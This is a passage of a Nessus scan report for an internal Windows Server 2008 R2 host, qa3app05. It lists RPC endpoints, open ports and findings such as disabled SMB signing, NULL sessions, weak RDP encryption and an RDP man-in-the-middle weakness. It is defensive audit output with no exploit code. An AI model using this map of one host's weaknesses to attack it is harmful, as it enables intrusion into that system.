a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : OLE92E5521E40FA40F59BD9C9B08B00 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : OLE92E5521E40FA40F59BD9C9B08B00 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : OLE92E5521E40FA40F59BD9C9B08B00 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : OLE92E5521E40FA40F59BD9C9B08B00 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : OLE92E5521E40FA40F59BD9C9B08B00 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc6 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : eventlog + + + + +The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network. +cifs445.nasl +2012/01/31 +Microsoft Windows SMB Service Detection +2002/06/05 +remote +None +$Revision: 1.37 $ +n/a +A file / print sharing service is listening on the remote host. + +An SMB server is running on this port. + + + +The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network. +cifs445.nasl +2012/01/31 +Microsoft Windows SMB Service Detection +2002/06/05 +remote +None +$Revision: 1.37 $ +n/a +A file / print sharing service is listening on the remote host. + +A CIFS server is running on this port. + + + + +Mon Jul 1 11:44:55 2013 +1 +general-purpose +Microsoft Windows Server 2008 R2 Standard Service Pack 1 +00:50:56:81:01:de +10.31.112.25 +172.16.138.2 +10.31.112.25 +qa3app05 +QA3APP05 +Mon Jul 1 11:33:11 2013 + + +This script displays, for each tested host, information about the scan itself : + + - The version of the plugin set + - The type of plugin feed (HomeFeed or ProfessionalFeed) + - The version of the Nessus Engine + - The port scanner(s) used + - The port range scanned + - Whether credentialed or third-party patch management checks are possible + - The date of the scan + - The duration of the scan + - The number of hosts scanned in parallel + - The number of checks done in parallel +scan_info.nasl +2013/05/31 +Nessus Scan Information +2005/08/26 +summary +None +$Revision: 1.59 $ +n/a +Information about the Nessus scan. +Information about this scan : + +Nessus version : 5.2.1 +Plugin feed version : 201306260615 +Type of plugin feed : HomeFeed (Non-commercial use only) +Scanner IP : 172.16.138.174 +Port scanner(s) : nessus_syn_scanner +Port range : default +Thorough tests : no +Experimental tests : no +Paranoia level : 1 +Report Verbosity : 1 +Safe checks : yes +Optimize the test : yes +Credentialed checks : no +Patch management checks : None +CGI scanning : disabled +Web application tests : disabled +Max hosts : 80 +Max checks : 5 +Recv timeout : 5 +Backports : None +Allow post-scan editing: Yes +Scan Start Date : 2013/7/1 11:33 +Scan duration : 700 sec + + + +One of several ports that were previously open are now closed or unresponsive. + +There are several possible reasons for this : + + - The scan may have caused a service to freeze or stop running. + + - An administrator may have stopped a particular service during the scanning process. + +This might be an availability problem related to the following : + + - A network outage has been experienced during the scan, and the remote network cannot be reached anymore by the scanner. + + - This scanner may has been blacklisted by the system administrator or by an automatic intrusion detection / prevention system that detected the scan. + + - The remote host is now down, either because a user turned it off during the scan or because a select denial of service was effective. + +In any case, the audit of the remote host might be incomplete and may need to be done again +check_ports.nasl +2013/05/14 +Open Port Re-check +2002/03/19 +remote +None +$Revision: 1.41 $ +- Increase checks_read_timeout and/or reduce max_checks + +- Disable any IPS during the Nessus scan +Previously open ports are now closed. +Port 135 was detected as being open but is now unresponsive +Port 3389 was detected as being open but is now unresponsive +Port 80 was detected as being open but is now unresponsive + + + +Based on the remote operating system, it is possible to determine what the remote system type is (eg: a printer, router, general-purpose computer, etc). +device_type.nasl +2011/05/23 +Device Type +2011/05/23 +combined +None +$Revision: 1.1 $ +n/a +It is possible to guess the remote device type. +Remote device type : general-purpose +Confidence level : 99 + + + +By using information obtained from a Nessus scan, this plugin reports CPE (Common Platform Enumeration) matches for various hardware and software products found on a host. + +Note that if an official CPE is not available for the product, this plugin computes the best possible CPE based on the information available from the scan. +cpe.nbin +2013/05/13 +Common Platform Enumeration (CPE) +2010/04/21 +local +None +$Revision: 1.19 $ +http://cpe.mitre.org/ +n/a +It is possible to enumerate CPE names that matched on the remote system. + +The remote operating system matched the following CPE : + + cpe:/o:microsoft:windows_server_2008:r2:sp1 -> Microsoft Windows Server 2008 R2 Service Pack 1 + +Following application CPE matched on the remote system : + + cpe:/a:microsoft:iis:7.5 -> Microsoft Internet Information Services (IIS) 7.5 + + + +Using a combination of remote probes (TCP/IP, SMB, HTTP, NTP, SNMP, etc...), it is possible to guess the name of the remote operating system in use. It is also sometimes possible to guess the version of the operating system. +os_fingerprint.nasl +2013/04/01 +OS Identification +2003/12/09 +combined +None +$Revision: 2.34 $ +n/a +It is possible to guess the remote operating system. + +Remote operating system : Microsoft Windows Server 2008 R2 Standard Service Pack 1 +Confidence Level : 99 +Method : MSRPC + + +The remote host is running Microsoft Windows Server 2008 R2 Standard Service Pack 1 + + +Each ethernet MAC address starts with a 24-bit 'Organizationally Unique Identifier'. +These OUI are registered by IEEE. +ethernet_manufacturer.nasl +2011/03/27 +Ethernet Card Manufacturer Detection +2009/02/19 +combined +None +$Revision: 1.9 $ +http://standards.ieee.org/faqs/OUI.html +http://standards.ieee.org/regauth/oui/index.shtml +n/a +The manufacturer can be deduced from the Ethernet OUI. + +The following card manufacturers were identified : + +00:50:56:81:01:de : VMware, Inc. + + + +According to the MAC address of its network adapter, the remote host is a VMware virtual machine. + +Since it is physically accessible through the network, ensure that its configuration matches your organization's security policy. +vmware_detect.nasl +2011/03/27 +VMware Virtual Machine Detection +2005/10/27 +combined +None +$Revision: 1.24 $ +n/a +The remote host seems to be a VMware virtual machine. + + +13818 +CVE-2005-1794 +5.1 +4.6 +CVSS2#E:F/RL:W/RC:ND +CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P +The remote version of the Remote Desktop Protocol Server (Terminal Service) is vulnerable to a man-in-the-middle (MiTM) attack. The RDP client makes no effort to validate the identity of the server when setting up encryption. An attacker with the ability to intercept traffic from the RDP server can establish encryption with the client and server without being detected. A MiTM attack of this nature would allow the attacker to obtain any sensitive information transmitted, including authentication credentials. + +This flaw exists because the RDP server stores a hardcoded RSA private key in the mstlsapi.dll library. Any local user with access to this file (on any Windows system) can retrieve the key and use it for this attack. +true +Exploits are available +tssvc_mim.nasl +17131 +2012/03/30 +Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness +2005/06/01 +remote +Medium +$Revision: 1.23 $ +http://www.oxid.it/downloads/rdp-gbu.pdf +http://www.nessus.org/u?e2628096 +http://technet.microsoft.com/en-us/library/cc782610.aspx +- Force the use of SSL as a transport layer for this service if supported, or/and +- Select the 'Allow connections only from computers running Remote Desktop with Network Level Authentication' setting if it is available. +It may be possible to get access to the remote host. +2005/05/28 +OSVDB:17131 + + +cpe:/o:microsoft:windows +This script attempts to connect to the remote host via RDP (Remote Desktop Protocol) and attempts to take a screenshot of the login screen. + +While this is not a vulnerability by itself, some versions of Windows display the names of the users who can connect and which ones are connected already. +rdp_logon_screen.nbin +2013/05/08 +RDP Screenshot +2013/04/22 +remote +None +$Revision: 1.4 $ +n/a +It is possible to take a screenshot of the remote login screen. +It was possible to gather the following screenshot of the remote login screen. +293713fa5c0d44310392df3bf9c784a3 + + +4.3 +CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N +The remote Terminal Services service is not configured to use strong cryptography. + +Using weak cryptography with this service may allow an attacker to eavesdrop on the communications more easily and obtain screenshots and/or keystrokes. +rdp_weak_crypto.nbin +2013/04/22 +Terminal Services Encryption Level is Medium or Low +2012/01/25 +remote +Medium +$Revision: 1.6 $ +Change RDP encryption level to one of : + + 3. High + + 4. FIPS Compliant +The remote host is using weak cryptography. + +The terminal services encryption level is set to : + +2. Medium + + +2.6 +CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N +The encryption setting used by the remote Terminal Services service is not FIPS-140 compliant. +fips_rdp.nbin +2013/04/22 +Terminal Services Encryption Level is not FIPS-140 Compliant +2008/02/11 +remote +Low +$Revision: 1.9 $ +Change RDP encryption level to : + + 4. FIPS Compliant +The remote host is not FIPS-140 compliant. + +The terminal services encryption level is set to : + +2. Medium (Client Compatible) + + +Terminal Services allows a Windows user to remotely obtain a graphical login (and therefore act as a local user on the remote host). + +If an attacker gains a valid login and password, he may be able to use this service to gain further access on the remote host. An attacker may also use this service to mount a dictionary attack against the remote host to try to log in remotely. + +Note that RDP (the Remote Desktop Protocol) is vulnerable to Man-in-the-middle attacks, making it easy for attackers to steal the credentials of legitimate users by impersonating the Windows server. +windows_terminal_services.nasl +2012/03/30 +Windows Terminal Services Enabled +2002/04/20 +remote +None +$Revision: 1.29 $ +Disable Terminal Services if you do not use it, and do not allow this service to run across the Internet. +The remote Windows host has Terminal Services enabled. + + +This test gives some information about the remote HTTP protocol - the version used, whether HTTP Keep-Alive and HTTP pipelining are enabled, etc... + +This test is informational only and does not denote any security problem. +http_info.nasl +2011/05/31 +HyperText Transfer Protocol (HTTP) Information +2007/01/30 +remote +None +$Revision: 1.12 $ +n/a +Some information about the remote HTTP configuration can be extracted. + +Protocol version : HTTP/1.1 +SSL : no +Keep-Alive : no +Options allowed : OPTIONS, TRACE, GET, HEAD, POST +Headers : + + Content-Type: text/html + Last-Modified: Tue, 01 May 2012 20:47:11 GMT + Accept-Ranges: bytes + ETag: "ca7a095db27cd1:0" + Server: Microsoft-IIS/7.5 + X-Powered-By: ASP.NET + Date: Mon, 01 Jul 2013 18:37:25 GMT + Content-Length: 689 + + + + +This plugin attempts to determine the type and the version of the remote web server. +http_version.nasl +2013/06/03 +HTTP Server Type and Version +2000/01/04 +remote +None +$Revision: 1.111 $ +n/a +A web server is running on the remote host. +The remote web server type is : + +Microsoft-IIS/7.5 + + +By calling the OPTIONS method, it is possible to determine which HTTP methods are allowed on each directory. + +As this list may be incomplete, the plugin also tests - if 'Thorough tests' are enabled or 'Enable web applications tests' is set to 'yes' in the scan policy - various known HTTP methods on each directory and considers them as unsupported if it receives a response code of 400, 403, 405, or 501. + +Note that the plugin output is only informational and does not necessarily indicate the presence of any security vulnerabilities. +web_directory_options.nasl +2013/05/09 +HTTP Methods Allowed (per directory) +2009/12/10 +remote +None +$Revision: 1.7 $ +n/a +This plugin determines which HTTP methods are allowed on various CGI directories. +Based on the response to an OPTIONS request : + + - HTTP methods GET HEAD POST TRACE OPTIONS are allowed on : + + / + + + + +cpe:/o:microsoft:windows +5.0 +CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N +Signing is disabled on the remote SMB server. This can allow man-in-the-middle attacks against the SMB server. +smb_signing_disabled.nasl +2012/03/05 +SMB Signing Disabled +2012/01/19 +remote +Medium +$Revision: 1.7 $ +http://support.microsoft.com/kb/887429 +http://www.nessus.org/u?74b80723 +http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html +Enforce message signing in the host's configuration. On Windows, this is found in the Local Security Policy. On Samba, the setting is called 'server signing'. See the 'see also' links for further details. +Signing is disabled on the remote SMB server. +2012/01/17 + + +The remote web server uses its default welcome page. It probably means that this server is not used at all or is serving content that is meant to be hidden. +www_default_page.nasl +2117 +2011/08/12 +Web Server Unconfigured - Default Install Page Present +2003/03/20 +remote +None +$Revision: 1.37 $ +Disable this service if you do not use it. +The remote web server is not configured or is not properly configured. +1994/01/01 +OSVDB:2117 + +The default welcome page is from IIS. + + + +It was possible to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request. +find_service.nasl +2013/05/12 +Service Detection +2007/08/19 +remote +None +$Revision: 1.123 $ +n/a +The remote service could be identified. +A web server is running on this port. + + +The name of this machine either does not resolve or resolves to a different IP address. + +This may come from a badly configured reverse DNS or from a host file in use on the Nessus scanning host. + +As a result, URLs in plugin output may not be directly usable in a web browser and some web tests may be incomplete. +bad_rdns.nasl +2011/10/06 +Inconsistent Hostname and IP Address +2010/05/03 +remote +None +1.6 +Fix the reverse DNS or host file. +The remote host's hostname is not consistent with DNS information. +The host name 'qa3app05' does not resolve to an IP address + + +Nessus was able to resolve the FQDN of the remote host. +fqdn.nasl +2012/09/28 +Host Fully Qualified Domain Name (FQDN) Resolution +2004/02/11 +remote +None +$Revision: 1.12 $ +n/a +It was possible to resolve the name of the remote host. + +10.31.112.25 resolves as qa3app05. + + + +Makes a traceroute to the remote host. +traceroute.nasl +2013/04/11 +Traceroute Information +1999/11/27 +remote +None +1.62 +n/a +It was possible to obtain traceroute information. +For your information, here is the traceroute from 172.16.138.174 to 10.31.112.25 : +172.16.138.174 +172.16.138.2 +10.31.112.25 + + + +cpe:/o:microsoft:windows +The Nessus scanner testing the remote host has been given SMB credentials to log into the remote host, however these credentials do not have administrative privileges. + +Typically, when Nessus performs a patch audit, it logs into the remote host and reads the version of the DLLs on the remote host to determine if a given patch has been applied or not. This is the method Microsoft recommends to determine if a patch has been applied. + +If your Nessus scanner does not have administrative privileges when doing a scan, then Nessus has to fall back to perform a patch audit through the registry which may lead to false positives (especially when using third-party patch auditing tools) or to false negatives (not all patches can be detected through the registry). +smb_scan_not_admin.nasl +2013/01/07 +Nessus Windows Scan Not Performed with Admin Privileges +2007/03/12 +local +None +$Revision: 1.11 $ +Reconfigure your scanner to use credentials with administrative privileges. +The Nessus scan of this host may be incomplete due to insufficient privileges provided. + +It was not possible to connect to '\\QA3APP05\ADMIN$' with the supplied credentials. + + + +It was not possible to connect to PIPE\winreg on the remote host. + +If you intend to use Nessus to perform registry-based checks, the registry checks will not work because the 'Remote Registry Access' service (winreg) has been disabled on the remote host or can not be connected to with the supplied credentials. +smb_registry_fail.nasl +2011/03/27 +Microsoft Windows SMB Registry : Nessus Cannot Access the Windows Registry +2007/10/04 +local +None +$Revision: 1.10 $ +n/a +Nessus is not able to access the remote Windows Registry. +Could not connect to the registry because: +Could not connect to \winreg + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 3389/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 445/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 80/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 135/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 139/tcp was found to be open + + +The remote host is running Microsoft Windows operating system or Samba, a CIFS/SMB server for Unix. It was possible to log into it using one of the following accounts : + +- NULL session +- Guest account +- Given Credentials +true +true +Exploits are available +smb_login.nasl +Microsoft Windows Authenticated User Code Execution +2013/04/23 +Microsoft Windows SMB Log In Possible +2000/05/09 +remote +None +$Revision: 1.136 $ +http://support.microsoft.com/kb/143474 +http://support.microsoft.com/kb/246261 +n/a +It is possible to log into the remote host. +1999/01/01 +- NULL sessions are enabled on the remote host + + + +It is possible to get the remote operating system name and version (Windows and/or Samba) by sending an authentication request to port 139 or 445. +smb_nativelanman.nasl +2013/06/25 +Microsoft Windows SMB NativeLanManager Remote System Information Disclosure +2001/10/17 +remote +None +$Revision: 1.40 $ +n/a +It is possible to obtain information about the remote operating system. +The remote Operating System is : Windows Server 2008 R2 Standard 7601 Service Pack 1 +The remote native lan manager is : Windows Server 2008 R2 Standard 6.1 +The remote SMB Domain Name is : RB + + + +The remote host listens on UDP port 137 or TCP port 445 and replies to NetBIOS nbtscan or SMB requests. + +Note that this plugin gathers information to be used in other plugins but does not itself generate a report. +netbios_name_get.nasl +2013/01/16 +Windows NetBIOS / SMB Remote Host Information Disclosure +1999/10/12 +remote +None +$Revision: 1.77 $ +n/a +It is possible to obtain the network name of the remote host. +The following 3 NetBIOS names have been gathered : + + QA3APP05 = Computer name + RB = Workgroup / Domain name + QA3APP05 = File Server Service + +The remote host has the following MAC address on its adapter : + + 00:50:56:81:01:de + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49152 : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49152 +IP : 10.31.112.25 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49153 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.25 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.25 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.25 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.25 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49177 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +TCP Port : 49177 +IP : 10.31.112.25 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49253 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0 +Description : Unknown RPC service +Annotation : Remote Fw APIs +Type : Remote RPC service +TCP Port : 49253 +IP : 10.31.112.25 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 +Description : IPsec Services (Windows XP & 2003) +Windows process : lsass.exe +Annotation : IPSec Policy agent endpoint +Type : Remote RPC service +TCP Port : 49253 +IP : 10.31.112.25 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49154 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.25 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.25 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.25 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.25 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.25 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.25 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49252 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 367abb81-9844-35f1-ad32-98f038001003, version 2.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49252 +IP : 10.31.112.25 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available remotely : + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\InitShutdown +Netbios name : \\QA3APP05 + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\InitShutdown +Netbios name : \\QA3APP05 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +Named pipe : \pipe\lsass +Netbios name : \\QA3APP05 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +Named pipe : \PIPE\protected_storage +Netbios name : \\QA3APP05 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Remote RPC service +Named pipe : \PIPE\W32TIME_ALT +Netbios name : \\QA3APP05 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP05 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP05 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : 